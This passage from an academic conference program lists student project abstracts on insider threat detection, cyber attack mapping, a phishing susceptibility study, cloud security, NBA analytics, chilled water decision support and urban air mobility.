over a nine-day range, with a majority of the web requests being made during typical workday hours. Within the set, seven random users are chosen to act as malicious insider users. The web proxy logs are modified for the seven malicious users to show that they are often visiting malicious webpages. Based on this, they will exceed the risk score threshold to qualify as insider threats. All generated insider threat activities are recorded and stored in a spreadsheet. The results of the tool are then compared with the spreadsheet to validate that the results are accurate. Overall, this project demonstrates a tool that is able to successfully automate and provide highly accurate insider threat detection within small businesses.

09:30
Warrie Proffitt (George Mason University, United States)
Hebah Beg (George Mason University, United States)
Jordan Poole (George Mason University, United States)
Cyber Attack Map

ABSTRACT. As the world continues to become more globally connected, the need for online security becomes more important. Along with an ever-increasing global connection, the desire to visualize network traffic is in demand. By creating a cyber attack map, we hope to address this problem by providing an accessible application to aggregate and visualize network traffic. The Cyber Attack Map (CAM) will process incoming traffic that has been denied by the external firewall and present a mapping of the connection between source IP addresses and their destination IP addresses. The development team consist of Warrie Proffitt, Hebah Beg, and Jordon Poole under the mentorship of George Mason facility and sponsored by Hexagon U.S. Federal. In order to complete development of the CAM, the application will be written entirely in JavaScript to properly interface with LuciadRIA, a geospatial visualization tool developed by Hexagon Geospatial. To store data associated with the incoming traffic, the team has utilized a SQLite database. Lastly, in order to properly identify the location of IP addresses, a third-party service has been integrated through asynchronous API calls. The front-end interface will display a real-time map of incoming denied IP addresses, with options for further filtering. These options will consist of filters for IP address density color-coding, the ability to sort by location (i.e. country, city etc.), the ability to filter by firewall rules, and the ability to display a history or timeline of given IP address connections. The application will also provide zoom and drag capabilities. As the development of the application is broken into three-week sprints, verification of the source code is completed at the end of each sprint. Unit testing and routine demonstrations to the customer are the verification and validation methods our team has implemented. Unit testing is used to validate that each component of the application performs as intended while routine demonstrations to the stakeholders allows for feedback on the application’s functionality and design. This project provides Hexagon U.S. Federal a visualization tool for analyzing potential malicious activity. With the use of LuciadRIA, our team was able to build an efficient, lightweight tool to identify the source of suspicious network activity.

10:00
Matt Glover (GMU CYSE, United States)
Humzza Raja (GMU CYSE, United States)
Karl Haessler (GMU CYSE, United States)
Winterdel Matsikure (GMU CYSE, United States)
Brennan Maynard (GMU CYSE, United States)
Countering Malicious Cyber Actors

ABSTRACT. The investigation of foreign influence during the 2016 U.S. presidential election revealed various tactics that were employed to sway public opinion and sow discord in American public discourse. These tactics have now created a sense of paranoia surrounding the trustworthiness of our sources of news. The goal of this project is to improve the capabilities identifying misinformation that would otherwise be used to influence the audience reading the news. IT service management company and US government contractor, Perspecta has an interest in this project, and is sponsoring our team, providing us guidance and resources to solve this problem. In order to address the problem, our team had to develop a concept of operations that would permit the necessary flexibility and goals of our project. Our first objective was to find a dataset that would contain a large swath of news which we could examine more closely. We then gathered our own data using a software called ScrapeStorm and cleaned the data we collected. This dataset would then have to be processed removing extraneous features and standardize our data. With the help of machine learning capabilities such as natural language processing, we are able to quantify various features of our data such as readability, consistency of emotion and subject. Finally equipped with this information, we will then be able to identify and respond to misinformation to improve the lives of others. In order to verify that the model is functioning properly, we must supervise the results and fine tune our programs and data flow. This is to ensure that the model aligns with the actual content. Repeating this process until we reach a satisfactory result, we will use the final model to process new sources of data we find. This can be from current news and/or past news that has remained inconclusive.

10:30
Te Ming Tiong (George Mason University, United States)
Abdulla Alhamer (George Mason University, United States)
Abdullah Alsaadi (George Mason University, United States)
Kristin DiMichele (George Mason University, United States)
Phishing Experiment and Analysis On User Susceptibility

ABSTRACT. In today’s technological era, phishing is considered to be one of the most serious cyber threats for organizations because a lot of the major cyber incidents, like data breaches, start with phishing emails. Phishing is defined as a cyber attack that utilizes disguised emails as well as other forms of communication to trick people into giving sensitive data like login credentials or other personal information. We are collaborating with George Mason University (GMU) to design a phishing campaign that will be conducted on undergraduate students to determine various factors affecting their susceptibility. We chose undergraduate students at GMU as our target instead of faculty and staff because most of the students do not have a cyber security background and are not required to undergo any rigorous security awareness training. As a requirement, it is mandatory for us to safeguard sensitive data which in our case are the students’ email addresses done by performing data de-identification processes so that all of the collected responses will be anonymous. We have divided the students into two main groups in which one of the groups will be tested based on the effectiveness of incentives while the other will be examined on the effectiveness of punishments in preventing students from being vulnerable to phishing attacks. In addition, we are going to measure the impact of two different types of phishing email templates that exploit human psychological factors and compare which one is more compelling. Gophish is an open-source phishing framework used for this study to send out the phishing email templates to the students through automation and allows the collection of data about who is clicking on phishing emails. After collecting and de-identifying all the data, it will be analyzed and compared to our observations made in our hypotheses. We will also provide some suggestions on the remediation based on the conclusions made.

11:00
Mahesh Addanki (George Mason University, United States)
Micheal Spainhour (George Mason University, United States)
Nakiyah Wright (George Mason University, United States)
Apache NiFi IPFIX Processing:

ABSTRACT. Apache NiFi IPFIX Processing: Mahesh Addanki, Micheal Spainhour, Nakiyah Wright

Today, technology is ever-present in commercial environments. Businesses and organizations are adding more devices to internal networks every day, and with this comes an increase in network traffic. Maintaining and securing enterprise networks at scale requires IT staff to stay informed about the changing needs of the organization rather than just maintaining the status quo. Network traffic analysis is one of the ways an IT team can observe network behavior. When analyzing network traffic, it’s not critical to see the packet contents. This metadata can reveal interesting information about your network such as: policy abuses, security incidents, uncover misconfigurations, and establish trends in network traffic. Due to the sheer amount of data moving in a network, it has become difficult to parse through it all efficiently. Our project aims to simplify identification of the trends in metadata by creating a data processor for IPFIX information using Apache NiFi. IPFIX information is an open standard protocol for transmitting flow metadata across networks from exporters to collectors. Despite the existence of an open standard, many vendors utilize proprietary solutions when implementing IPFIX exporters and collectors. NiFi itself is an open source platform for data processing and distribution. Our requirements include creating a processor for the five tuple information in the IPFIX format to support both DNS and NTP protocol connections, initializing a scalable database solution for storage, and having an integrable Redhat 7 infrastructure. Our project has many stakeholders including: consumers, enterprises, governmental agencies, as well as multi-industry vendors. By working in an Agile-based methodology, we are able to quickly provide transparent progress reports to stakeholders during the lifecycle of the project. The proposed processor utilizes CERT’s Yet Another Flowmeter and Super_Mediator to process the metadata after ingestion into NiFi. Together, these tools provide support for live captures from an interface that routes directly into NiFi, removing the need for a proprietary exporter and collector (solution). Data processing occurs inside NiFi, as fields of interest are passed to a database for storage. Due to the particular use case as an enterprise traffic monitor, our solution must work at scale. NiFi’s method of data distribution using reference passing helps to accomplish this alongside using a suitably powerful system for actual processing and storage. The processor should be able to correctly identify critical information, including source and destination IP addresses, ports and protocol used. In order to test our data flows, we process large capture files filled with various types of network traffic. After validating the database records with the appropriate JSON files, we can classify the implementation as a success. In a business landscape application of our project, our project’s functionality and scope can be expanded to include most of the customer’s network traffic. This information is crucial to advertisement marketing campaigns, by using our project to target advertisements on frequently visited websites within certain time periods along with any cyber-security aspects such as malicious actors and malicious network use cases.

13:00-16:00 Session 2A: Decision Support Systems
Chair:
Ran Ji (George Mason University, United States)
13:00
David Pinter (West Point, United States)
David Hughes (West Point, United States)
NBA Rebound Analysis: A Study of Weak and Strong Side Rebounds with Respect to Shot Origin, Defender Proximity, and Rebounder Movement

ABSTRACT. This research first aims to test a common coaching heuristic that most rebounds go to the weak side. By using NBA player location tracking data, each shot and rebound is placed into one of sixteen zones as defined by the authors. The zones of the shots and rebounds are then used to determine if a strong side or a weak side rebound occurred. The number of strong and weak side rebounds are aggregated to find the rebound trend for the entire court as well as each zone. The research then determines if there are specific shooters whose rebound trends run contrary to the aggregate results. This analysis allows rebounders to identify and move to the appropriate zone that maximizes their likelihood of securing the rebound based on the shooter and location of the shot. Next, shots are classified as either contested or uncontested and then analyzed to see if rebound location trends change. Finally, the dataset is analyzed to determine rebounder movement. Analysis is conducted on the top rebounder in the league to see how active he is based on the distance traveled from his origin at the time of the shot to when he secured the rebound. This allows for comparisons between top and average rebounders.

13:30
Billal Gilani (GMU SEOR, United States)
Renzo Herrera Fallaque (GMU SEOR, United States)
Andy Tapia (GMU SEOR, United States)
Lucky Bakhtawar (GMU SEOR, United States)
George Mason University Chilled Water Decision Support System

ABSTRACT. George Mason University (GMU) utilizes a Central Heating and Cooling Plant (CHCP) to provide the Fairfax Campus with chilled water and high temperature hot water for buildings’ heating, ventilation, and air conditioning (HVAC) needs. The Chilled Water System (CWS) is powered by electricity and provides cooling to campus of up to 11,340 cooling tons. The CWS consists of one heat exchanger for Free Cooling, a Thermal Storage Unit (TSU), ten chillers, and ten cooling towers. Four of these chillers are purpose built for the TSU and have two modes of operation either recharging the TSU or providing mechanical cooling.

The CWS is controlled by a semi-automatic SIEMENS control system. Decisions concerning configurations of the CWS to meet cooling needs are made by CHCP Operators either by utilizing SIEMENS preset settings or through heuristics, both of which are unoptimized methods of operation. CHCP operators are overseen by GMU’s Environmental Quality and Efficiency (EQE) Department, who manage overall CHCP operations. With GMU environmental goals of reaching climate neutrality and increasing temperatures due to climate change, the EQE needs a solution to meet climate goals while maximizing efficiency. Supporting the EQE, the CHCP operators and supervisors need a way to better achieve this same goal and assist in operating the CWS.

In order to achieve these goals, our solution utilizes stochastic simulation, optimization, and a 36-hour forecaster to implement a Decision Support System (DSS). This optimization builds upon a previous case study and is verified by previous data recorded at the CHCP. The implementation of the DSS shall reduce yearly costs, on-peak electrical power purchases, and meet cooling demands of campus. The DSS uses a graphical user interface (GUI) to support operator decision-making, allow for the display of forecasted conditions and to serve as a knowledge transfer medium to new operators. Design of the DSS has resulted in two configurations: Integration with and without SIEMENS control system. The configuration without integration was designed to meet infrastructure concerns providing an alternative with a standalone optimization. For the alternative with integration, data is shared with the DSS to provide more accurate optimization of the CHCP.

A DSS to assist CHCP Operators in meeting environmental goals demonstrates progress towards meeting climate neutrality at GMU. The CHCP is a critical part of the Fairfax campus infrastructure, supplying nearly all HVAC needs to all buildings on campus. While there may be commercial solutions available to purchase, this DSS is custom designed for the specific needs of GMU, the EQE, and CHCP operators. Final software is validated by the EQE and CHCP Operators through usability testing.

14:00
Thomas Williamson (United States Military Academy, United States)
David Hughes (United States Military Academy, United States)
John Case (United States Military Academy, United States)
Ball Screen Spacing: A Study on the Positioning of Players During a Ball Screen in Relation to a Successful Possession

ABSTRACT. The National Basketball Association (NBA) utilizes advanced sports analytics in order to improve the game of basketball and inform coaches and players of trends within the league. The ball screen has become one of the most common actions for offenses in the NBA, drawing the attention of sports researchers. For the first time, the NBA shared player positioning data with the authors in order to research this new field of interest. Although multiple studies have analyzed the effectiveness of ball screens within the game of basketball, none of these studies have analyzed the factor of spacing and its impact on success. This paper explores the relationship between the positioning of offensive players during a ball screen and its impact on the success of the possession by analyzing geospatial data, to include the position of each offensive player during a ball screen, from approximately 40 games of five different NBA teams (which have been deidentified). This paper uses statistical tests to examine if there are certain zone combinations that better correlate to a successful possession than others, as well as determining whether use of zone combinations differ between the five teams. Additionally, research into the impact of the origin of the screen is presented to determine if it will influence a successful possession. This analysis can be used by NBA coaches and players to inform offensive strategies and improve the way the game of basketball is played and understood.

14:30
Parastou Moghaddam (George Mason University, United States)
Harkaran Singh (George Mason University, United States)
Karan Sharma (George Mason University, United States)
Noha Elissawy (George Mason University, United States)
Jeong-Joo Park (George Mason University, United States)
Composable DevOps Architecture: The Need for Secure and Flexible Deployment

ABSTRACT. Abstract⎯ By the end of 2020, 83% of enterprise IT operations will resort to cloud platforms [1]. Companies are choosing to transition to cloud environments due to many benefits associated with cloud services, including: affordability, security, scalability, resiliency, and agility. Cloud computing eliminates guesswork about the company’s capacity needs as there is no need for upfront capital costs or predicting future work loads. Underutilized on-premise hardware resources can be replaced by on-demand resources provided by cloud service providers (CSPs). With only a few clicks, the process of scaling-in or scaling-out whether horizontally or vertically can be fully automated. While cloud computing offers massive economies of scale, understanding cloud computing best practices in order to enhance security and avoid vendor lock-in has been an ongoing challenge for some companies. Companies strive to migrate to cloud-based technologies but for many the risk of vendor lock-in is a barrier hard to overcome. Beside negotiation and business-wise strategies that all companies need to follow, designing a composable architecture that incorporates applications that can be easily decoupled and transferred from one platform to another is a key factor. In other words, application compatibility plays a major role to reduce the risk of proprietary lock-in. In this paper, two major cloud platforms: Amazon Web services (AWS) and Microsoft Azure are investigated to demonstrate best practices in cloud environments. A comprehensive analysis of creating an application by exclusively incorporating open-source tools to orchestrate a DevSecOps pipeline is illustrated. Continuous testing of the pipeline for security and functionality purposes is verified by performing smoke testing, security testing, and performance testing. In addition, the process of containerization and deployment of applications are explored to analyze scalability and maintain efficiency of resources. The goal is to highlight the benefits of using open-source tools to optimize cost, prevent vendor lock-in, and secure the architecture.

REFERENCE

[1] Columbus, L. (2018). 83% of enterprise workloads will be in the cloud by 2020. Forbes,https://www.forbes.com/sites/louiscolumbus/2018/01/07/83-of-enterprise-workloads-will-be-in-the-cloud-by-2020/#39f45006261a

15:00
Felix Ruble (George Mason University, United States)
Katherine Graves (George Mason University, United States)
Naseem Shah (George Mason University, United States)
David Nguyen (George Mason University, United States)
Yacht Club Cash Flow Forecasting Model and Capital Investment Plan

ABSTRACT. The purpose of this project was to provide a cash flow forecasting tool and a 10-year capital investment plan to a yacht club on the Chesapeake Bay. This club has seen operating losses for the past decade, and as a result, has depleted its already limited capital reserves. Furthermore, much of the key infrastructure that this club needs to operate is either nearing or has exceeded its expected lifespan. Key high-level items that need to be replaced in the next few years include three of the four docks, five HVAC units, and the clubhouse’s roof. Key stakeholders for this project included the project sponsor, the club’s Long Range Planning Committee, as well as club management and staff, club members in leadership roles, regular club members, financial institutions, competing clubs and marinas, and state and local regulatory bodies. The concept of operations for the cash flow forecasting model was to model the yacht club as a set of profit and loss centers, where each profit and loss center has predefined input parameters. The model then used these parameters to calculate and forecast cash flow line items. The profit-loss centers modelled were the dock, the fuel system, the bar and restaurant, and clubhouse miscellaneous, which included general overhead items and income from dues paid by club members. The cash flow forecasting model was implemented as a desktop application with a simple graphical user interface that can be used by club leadership and management to produce their own cash flow forecasts. This application was developed in python, and meets input and output requirements agreed upon with the project sponsor. The model outputs were verified by using current parameters to calculate budget items for the current year, and comparing these to the same budget items in recent financial data. The model was validated by taking parameters that reflect a year in the past and attempting to forecast income and expense items from the past year to the current year. Using the cash flow forecasting tool, the team produced cost constraints for the capital investment plan based on a handful of likely scenarios. The capital investment plan was constructed using multi-attribute utility functions to calculate utility values for a broad set of investment items.The attributes used to calculate utility were visual appeal, return on investment, criticality to club operations, and environmental impact, with weights of 30%, 30%, 30%, 10% respectively. Finally, the team delivered the cash flow forecasting tool to the sponsor, along with a set of recommended capital investments for different forecasted scenarios within the 10-year time span.

13:00-16:00 Session 2B: Software Security
Chair:
Mohamad Gebril (George Mason University, United States)
13:00
Douglas Benson (3B&T, United States)
Shantel Butterfield (3B&T, United States)
Connor Taber (3B&T, United States)
Joshua Beach (3B&T, United States)
FCC Roll Call

ABSTRACT. The Roll Call project is being conducted for the Federal Communications Commission (FCC) by team 3B&T from George Mason University (GMU). The purpose of this project is to improve the existing functionalities and interfaces of the Roll Call software. Roll Call is an RF communications solution that is utilized by engineers within disaster zones; the software aims to better coordinate disaster relief efforts, including restoration to communications systems and Federal Emergency Management Agency (FEMA) relief efforts. Engineers operating Roll Call conduct two scans, one pre-disaster and one post-disaster. Disaster relief efforts are then coordinated upon the comparison of these two scans.

The requirements for this project involve replacing the existing Windows Command Line Interface (CLI) with a Graphic User Interface (GUI). Additionally, a dashboard providing post scan data must be implemented and viewable on-site, since reports are only viewable from FCC headquarters. The FCC has provided 3B&T with the necessary software, equipment, and licensing databases to deliver these requirements, which were fulfilled through proper designing, testing, validation, and implementation.

The design introduces a GUI, created through the Python cross-platform GUI toolkit Qt (PyQt5) library, that allows engineers to input initial scan parameters and header information into a user-friendly environment. The GUI requests the following pre-scan information: engineer name, scan name, date, city, state (if applicable), zip code, scan length, latitude and longitude, scan radius, and preset/custom RF bands. Before and after a disaster, an engineer travels to an assigned location with the Roll Call software and equipment. Upon entering and verifying information inputted into the GUI, the engineer runs the scan on-site. At the end of each scan, the database (SQLite3) is updated and scan results are presented in a dashboard on-site containing missing and anomalous frequencies, signal plots, and a Google Earth map to immediately begin relief efforts.

Additionally, there is a viewable excel report containing all information inputted into the GUI and outputted from the receiver. However, the main function of the excel report is to organize scan information to improve and simplify the transition to the database. The database is updated after every scan, allowing it to be utilized for future scans to prevent anomalous frequencies. Ultimately, the new design must be built upon the existing code, not impede the current functionality, continue to operate on the Windows operating system, and remain local (no internet connectivity).

Our software will be implemented onto a laptop provided by the FCC for testing procedures. Our testing procedures were divided into two parts: GUI testing and database testing. GUI testing primarily consisted of real-world simulations to test a variety of commonly entered parameters. Additionally, program debugging practices were implemented to ensure vulnerabilities and program crashes were at a minimum. Database testing involved the use of a Python script to fill the database with entries to simulate long term use of the program, check performance on startup, and check performance on any other place with a database query.

13:30
Edwin Hyatt III (George Mason University, United States)
Angelica Espinoza-Calvio (George Mason University, United States)
Zach Kaylor (George Mason University, United States)
Roberto Basurto (George Mason University, United States)
Nathan Mammen (George Mason University, United States)
Securing AWS Instances

ABSTRACT. The team BAHx Security was assigned to the sponsor Booz Allen Hamilton (BAH), with SME Ryan Morrell and customer Rod Wetsel. The team tasked with the project of securing multiple EC2 instances in an AWS environment using open-source and native AWS tools. Three EC2 instances were classified as low-risk, moderate-risk, and high-risk using NIST SP 800-60 and NIST SP 800-53. A fourth instance was assigned the role of receiving logs and sending out patches to the three data-protecting instances. The team followed the requirements set forth by the RFP that called for the use of an AWS account throughout the duration of the project; as well as EC2 instances that would have sufficient computing capacity to handle the implementation of open-source tools on the data-protecting instances. The open-source tools and security controls were researched and implemented onto the four instances in accordance with the respective risk-level of each instance. Once differentiation of the instances was set, the team designed a security architecture, data model and created a concept of operations (CONOPS) for the instances that portrayed how they would be secured. The CONOPS and security architecture describe the structure of the AWS environment as three data-protecting instances containing low, moderate, and high-risk data, and one instance for sending patches and receiving logs. Users will authenticate to the instances through the use of public/private key-pairing and each instance will have limited ports open depending on their risk-level. The instances will be inside a virtual private cloud (VPC) and will be placed into a public or private subnet in accordance with their risk-level. Additionally, the instances will be placed into security groups that will act as a firewall. The data model expresses the three risk-based instances generating and sending logs to the fourth instance to be kept in storage and analyzed if necessary. The fourth instance would be connected to the Internet and be responsible for periodically checking for necessary updates needed to keep all instances patched and up to date. Once the fourth instance has fetched updates to disburse, it would release them to the other three instances at an appropriate time so as not to interrupt crucial uptime hours. Each of the data-protecting instances would be producing logs respective to their data classification and there will be an increase in the volume and detail of logs once the data reached high-risk data. To fulfill the verification method, the team will gather verification evidence for each requirement and the project will be reviewed and verified by BAH customer and SME in accordance with the provided requirements. The team will also provide BAH with a list of tool recommendations and analysis to assist in any future business plans the sponsor may have.

14:00
Jennah Fayyaz (George Mason University, United States)
Parham Neyzari (George Mason University, United States)
Michael Wilson (George Mason University, United States)
Anomaly Detection Analysis

ABSTRACT. Our project consists of developing an integrated dashboard that is able to detect and display anomalies, which utilizes the open source software called ELK stack. ELK stack consists of 3 different softwares, including Elastic, which provides the data analysis portion, Logstash, which processes logs, and Kibana, which allows you to create a dashboard to visualize your data. Using Elastic, we will analyze Windows log files and use the machine learning feature to detect anomalies. By doing this, we will be able to find out if there are errors or security flaws. We will then use Kibana in order to create an integrated dashboard, that will allow for visualization of the data. Once an anomaly has been detected, it will alert the person on duty and provide a mitigation or suggestion that will help alleviate the issue. The stakeholders in this project would be the Cybersecurity Infrastructure and Security Agency, as well as their counterpart, the Department of Homeland Security. By creating this, it will be the start to a means that allows them to monitor all the federal departments and agencies with additional ease and security. The concept of operations begins with the algorithm being fed relevant data, the data is analyzed and displayed on the dashboard, algorithm parses and compares data, the potential anomaly being found and the SOC (Security Operation Center) analyst taking action. The requirements are an integrated dashboard that utilizes Elastic with Kibana which allows the data to be visualized in graphs and/or charts that will be displayed using raw data and analytics with the anomalies detected. The dashboard will also trigger alerts for those anomalies and a proper course of action, such as suggested recommendations for mitigating the issues. Recommendations for mitigating the issues is to be completed in series by starting with finding data sets to be used for testing. Then building a cloud environment in AWS, utilizing software to design and implement data visualization, especially analysis of data, design and implement an “Alerts and Recommended Actions” portion. Lastly creating a modeling documentation which includes a user manual. The implementation will take place in an AWS cloud deployment hosted in Elastic. As for verification and validation, if logs are inputted, and the correct anomalies are detected, along with an alert being sent out, that would mean that it was successful in its creation.

14:30
Ryan Berry (George Mason University, United States)
Benjamin Troxel (George Mason University, United States)
J.Chris Coleman (George Mason University, United States)
DAX, LLC – Project: Distributed Academic Community

ABSTRACT. DAX, LLC – Project: Distributed Academic Community Ryan Berry, Benjamin Troxel, J.Chris Coleman rberry6@masonlive.gmu.edu btroxel@masonlive.gmu.edu 1j.chriscoleman@gmail.com CYSE Department, George Mason University DAX LLC

The objective of this effort is to build a prototype digital academic community that can demonstrate how a smart contract and blockchain architecture can be used to better the e-learning industry. As part of this effort, a framework will be developed that includes a hierarchy of smart contracts, a blockchain architecture, and three different types of tokens to be exchanged. The stakeholders of this project are DAX LLC, and a voodoo model of operation was employed for the project’s development lifestyle with weekly testing and verification of our code. The voodoo system being implemented is targeted to complete singular tasks one at a time following our design plan, allowing for tasks to be easily delegated to other teams if the project is not fully completed in our groups timeline. Requirements include a classroom environment that contains three distinct user types of “Student, Teacher, and Sponsor,” and a token system to keep track of grades and monetary compensation for both the student and teacher user types. This token system will be attached to a block-chain architecture to allow for proof of work/ownership of the tokens as a means of proving a user’s ownership of “Grade Tokens” (grade in the classes) and “Reward Tokens” (monetary reward earn-able by both student users and teacher users). Grade Tokens will be stored in a block-chain system similar to a grade-book would be setup in a normal classroom, while the reward tokens will be kept track of using a normal block-chain ledger system. The classroom structure is a module based system where students will complete modules created by the teacher users of the classroom in a specific order to proceed through the class until "graduating" from said class. The students will receive a proof of completion in the class via an email form of a diploma, which will be tied to the environment's block-chain so that individuals can view the students documented completion of the course. The design for the classroom was implemented using Python Django to create a prototype website using best secure coding practices along the way in the creation of this “Proof of Concept.” In order to test the environment, the website prototype is currently being deployed to the cloud using Amazon Web Services, where more security checks will be done. The cost of our project is just the monthly recurring cost of the AWS instance being used, which we predict to be somewhere between $5.00-$6.66 per month, with future scalability of the cost down the road if the environment catches on.

15:00
Alyssa Lopez (George Mason University Cyber Security Engineering, United States)
Samuel Faulconer (George Mason University Cyber Security Engineering, United States)
Hissah Almarzook (George Mason University Cyber Security Engineering, United States)
Edwin Padilla-Gonzalez (George Mason University Cyber Security Engineering, United States)
No Equipment Failed/No Malicious Intent (NEF/NMI) Cyber-System Failures in Nuclear Power Plants

ABSTRACT. No Equipment Failed/No Malicious Intent (NEF/NMI) cyber-system failures are failures caused by unforeseen complications that arise from changes made to a complex system. NEF/NMI failures occur with neither equipment failure nor a malicious actor. Since complex systems generally require changes, upgrades, and modifications to both software and physical systems, organizations operating complex systems will experience NEF/NMI cyber-system failures if proper precautions are not taken prior to implementing modifications.

In 2008, The Edwin I. Hatch nuclear power plant in Georgia experienced a NEF/NMI failure when an unexpected shutdown of their second nuclear reactor occurred [1]. The shutdown was caused by a configuration change that allowed a plant employee to monitor and control the system in the production environment via their workstation. There was no equipment failure, neither was there any malicious intent behind this engineer’s decision. However, no testing was performed prior to implementing the configuration change, therefore there was no indication that the configuration change was safe to implement. Had the configuration change been tested to see how the system would react to the change, this failure may have been prevented.

There are currently no specific products for detecting potential NEF/NMI failures. The goal of this research was to provide a method to aid organizations in making risk-based decisions regarding changes and updates in order to decrease the likelihood of NEF/NMI failures occurring as a result of implementing those changes and updates. In order to ensure that the proper testing is performed prior to implementing a modification to a complex system, a Decision Support System (DSS) was created to model the NEF/NMI risks of applying modifications to a Boiling Water Reactor (BWR) Nuclear Power Plant (NPP).

The DSS considers the risk of applying a modification to a Boiling Water Reactor (BWR) Nuclear Power Plant (NPP) system by using the likelihood of a failure given that the proposed modification is applied to the system and the potential impact of that failure. Based on the risk associated with the modification, the DSS recommends tiers of previously defined testing that should be performed prior to deciding to apply the change or update. Based on the results of testing, plant engineers will make a risk-based decision on whether it is safe to implement the modification to the BWR system(s).

This research was conducted for the Systems Engineering and Operations Research Department at George Mason University.

13:00-16:00 Session 2C: Transportation and Logistics
Chair:
Rocelle Jones (George Mason University, United States)
13:00
Megan Taylor (George Mason University, United States)
Asya Saldanli (George Mason University, Turkey)
Andy Park (George Mason University, United States)
Design of a Vertiport Design Tool

ABSTRACT. Advances in technology (e.g. electric vertical takeoff and landing (eVTOL) aircrafts, and machine learning guidance systems are enabling the deployment of an Urban Air Mobility (UAM) transportation systems for congested metropolitan areas with long, unreliable commutes. The UAM transportation system will enable passengers to bypass surface congestion by flying over the congestion between vertiports. A fully operational UAM transportation system in a large metropolitan area is expected to have more than 20 vertiports.

Vertiports are designed to perform the operations for the eVTOLs including: vehicle landing, passenger disembarking, post-flight check, battery swapping, maintenance, pre-flight check, and passenger embarking. These operations must take place in the available real-estate and satisfy throughput requirements as well as regulations with regard to noise and safety. Architecture firms designing the vertiports need system engineering support to determine the trade-offs between surface area for the Vertiport and UAM vehicle throughput for alternate operational design configurations while considering noise and safety.

This paper describes a Vertiport Design Tool (VDT) to compare the vehicle throughput performance, surface area, vehicle wait times, noise, and safety. The analysis is conducted using a stochastic simulation of the seven vertiport operations listed above. Vertiport configurations include (1) a Multi-function Single Pad, (2) a Hybrid: with one Landing Pad and multiple Staging Pads, and (3) a Linear Sequence of Single Function Pads. The stochastic simulation is run in a Monte Carlo format to calculate vehicle throughput, vehicle queue length, vehicle wait time, the battery wait time, and the vehicle time at the vertiport. The design alternatives are compared with a Multi-Attribute Utility model including: noise, safety, and vehicle wait time. A ranking of the feasible designs and output statistics are available for each design.

Analysis using the simulation shows the complex relationship between surface area and vehicle throughput. The smallest surface area for the Multi-Functional Single Pad design with two batteries (39m by 69m) generates a vehicle throughput of 3 vehicles per hour at the smallest interarrival rate of 20 minutes. The smallest surface area for the Hybrid design with two batteries (64m by 69m) generates a vehicle throughput of 5 vehicles per hour at the smallest interarrival rate of 12 min. The smallest surface area for the Linear Single Function Pads design with two batteries (69m by 163m) generates a vehicle throughput of 5 vehicles per hour at the smallest interarrival rate of 11 min. As the surface area increases the throughput increases while the smallest allowable interarrival rate decreases.

The VDT provides architects the ability to investigate the operational performance of alternate Vertiport configurations for the available surface area to meet the UAM vehicle throughput required to support the UAM transportation system. This product will be a website which will cost $350,000 per product. Projected sales of the VDT of 21 units for 5 years which will produce a profit of $6 million dollars, Return on Investment (ROI) will be 465% in 5 years, and will break even in the 3rd year.

13:30
Benjamin Whitlow (United States Military Academy, United States)
Increasing Asset In-Transit Visibility at Fort Bragg, North Carolina

ABSTRACT. The U.S. Army maintains a ready-to-deploy unit at Fort Bragg, North Carolina that is known as the Immediate Response Force which contains more than 3,000 soldiers and hundreds of pieces of equipment. When given the order to deploy—such as the one given when the U.S. Embassy in Iraq was attacked in December 2019—the Immediate Response Force must rapidly prepare its equipment to be loaded onto aircraft and shipped overseas. Currently, these assets (containers, vehicles, pallets, etc.) are manually tracked as they move through the various steps of the deployment sequence. This process involves soldiers visually identifying assets and then reporting this information to a central location that tracks the movement of all equipment, thereby giving the unit commander an understanding of where their equipment is in the deployment process. Unfortunately, this method has significant shortcomings. It only provides commanders—the primary stakeholders in this problem—the last known position of their assets versus a real-time location. This method also consumes time and manpower, the two most valuable and finite resources the commander has. Because unit leaders are unable to know the precise location of their assets, their ability to allocate resources effectively is decreased significantly. This paper researches current technologies and identifies potential solutions to increase commanders’ in-transit visibility of deploying assets. Technologies such as radio-frequency identification (RFID), global positioning systems (GPS), and long-range wide area network (LoRaWAN) will be discussed in terms of their required infrastructure (to include gateway towers, sensors, wireless connections, and wired connections), implementation feasibility, the benefits produced by each alternative, the tradeoffs to consider with each solution’s implementation, and the validation procedures used to ensure proper functioning of each technology’s tracking system solution. A value-focused systems engineering decision process is applied to generate and evaluate each alternative solution for meeting the needs of commanders at Fort Bragg. The presented solutions show how incorporating new technologies and automating aspects of the current process can improve commanders’ visibility of critical assets and their ability to make more informed decisions.

14:00
Mary Taylor (George Mason University, United States)
Lauren Flenniken (George Mason University, United States)
Jason Nembhard (George Mason University, United States)
Anderson Barreal (George Mason University, United States)
Design of a Rapid Reliable Urban Mobility System for the Washington, D.C. Region

ABSTRACT. The Washington D.C. region is ranked 5th in the U.S. by GDP per capita with a population of 6.1M people including a housing density of 11,200 people per square mile. The region is ranked 3rd worst for traffic congestion. Travel times from airports to business districts are 160% greater than unimpeded travel times. Traffic congestion serves as drag on the economic prosperity of the region. A confluence of technological advances enables Urban Air Mobility (UAM) transportation systems using electric Vertical Takeoff and Landing Vehicles (eVTOL) and safe, secure air traffic control systems.

Analysis of travel demand profiles have identified the initial phase of the developing a Rapid, Reliable, Urban Mobility System (RRUMS) for the D.C. Region. RRUMS serves as aerial transportation that connects local airports to central business districts within 60 miles. Customers for RRUMS will be arriving and departing at airports on private jets and flying first class, totaling 1,886,768 passengers per year. Other users for RRUMS will be business employees on a tight schedule and tourists. Initially, an estimated 1% of specified clientele will participate in the UAM adoption. Customers will schedule their travel with RRUMS on a mobile application, inputting current location and destination. The application will return a wait time, travel time, and price. Vertiports for the RRUMS were identified at Dulles Airport, Tysons Corner, Bethesda, Union Station, and National Airport.

A stochastic simulation was developed to determine the optimal fleet size and vertiport throughput required for RRUMS. The inputs and parameters to the simulation are the passenger inter-arrival rate, fleet size, vehicle speed, number of landing pads at each vertiport, and the number of parking spaces at each business location. Outputs include queue lengths and wait times for passengers waiting for their vehicle and vehicles waiting for available landing pads, on-time reliability, travel time, and battery reserve required. Flight times are determined by vehicle speed and geodesic distances that travel predefined paths. Vehicle speed, boarding times, and vertiport operation times are random variables based on normal distributions, which makes flight time a random variable. Passenger interarrival times are based on a Poisson distribution.

In the case where there are two landing pads at each vertiport, boarding times average seven minutes, passenger interarrival rates average 30 minutes, vehicle speeds average 80 MPH, and five parking spaces at each business location, there will be a vehicle interarrival rate of between 3.449 and 3.804 minutes with 50 vehicles required to meet the demand and make passengers wait no more than 20 minutes for their vehicle. The total flight times will be between 21.792 and 22.721 minutes.

